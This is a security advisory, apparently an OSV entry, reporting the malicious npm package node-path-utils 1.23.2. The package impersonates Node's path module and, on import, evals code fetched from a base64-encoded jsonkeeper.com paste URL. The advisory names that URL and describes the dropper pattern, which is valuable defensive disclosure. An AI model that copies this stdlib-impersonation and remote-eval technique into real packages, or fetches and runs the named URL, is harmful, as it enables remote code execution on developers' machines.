MAL-2026-5985

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/node-path-utils/MAL-2026-5985.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5985

Published

2026-06-17T04:20:30Z

Modified

2026-06-17T06:02:04.405007554Z

Summary

Malicious code in node-path-utils (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (180db640dc8207694eb4629834f74b740d7efc9febf26067d190e10656fe04e9)

Package name node-path-utils and its README/description claim it is 'an exact copy of the NodeJS path module', impersonating the Node.js core path standard library to lure developers into installing it. On require() of the main entry (path.js), a top-level IIFE invokes loadTokenData(), which decodes a base64-encoded URL (aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9QMENORA== → https://www.jsonkeeper.com/b/P0CND), fetch()es it, and passes the response JSON's content field directly to eval(). jsonkeeper.com is a free, mutable JSON-paste service: whoever controls the paste can swap the served code at any time, executing arbitrary attacker-controlled JavaScript in the consumer's Node process on every import. Additionally, path.js does require('mddriver') at module top with mddriver: "*" in dependencies — an unused, unpinned third-party package pulled into the installer's process at import, providing a second smuggling vector for attacker code via the transitive dependency. The combination of stdlib impersonation, base64-obfuscated remote fetch, eval of mutable paste-host content, and an unused wildcard-pinned sidecar dep is an unambiguous remote-code-execution dropper.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "180db640dc8207694eb4629834f74b740d7efc9febf26067d190e10656fe04e9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-17T04:20:30Z",
            "versions": [
                "1.23.2"
            ],
            "id": "IN-MAL-2026-006880",
            "import_time": "2026-06-17T05:45:41.991284706Z"
        }
    ]
}

References

https://www.npmjs.com/package/node-path-utils/v/1.23.2

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / node-path-utils

Package

Name: node-path-utils; View open source insights on deps.dev
Purl: pkg:npm/node-path-utils

Affected ranges

Affected versions

1.*

1.23.2

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/node-path-utils/MAL-2026-5985.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "275628b95a69767953c674b4367b8547265c39c1d40d460e9d29e80685999a3c",
            "tlsh": "48828444594661599a3777b0df0a340ef77684f34215ab00f89cea502f72e78a2feed8",
            "path": "path.js"
        },
        {
            "sha256": "f41e67088d05fb2b7f35cbad49a766d326dced0605a7186eaf39aa8cdc057873",
            "tlsh": "e7e0ab109f51ad3312ea136a9d2c40577360cecf0514bc0023ca0aac968e4bba6f228c",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-iU+w0cRqYcmoH8ZnqMJkSHliff9zYoOMMtisJMFRsNTvYHqcUFINWMoCSazSWv607G4OS8glwITFyIkFuAJEFg==",
                "sha1": "a748e95bcb154a75df422d85ea4a4013d6d0d4d8"
            },
            "filename": "node-path-utils-1.23.2.tgz"
        }
    ]
}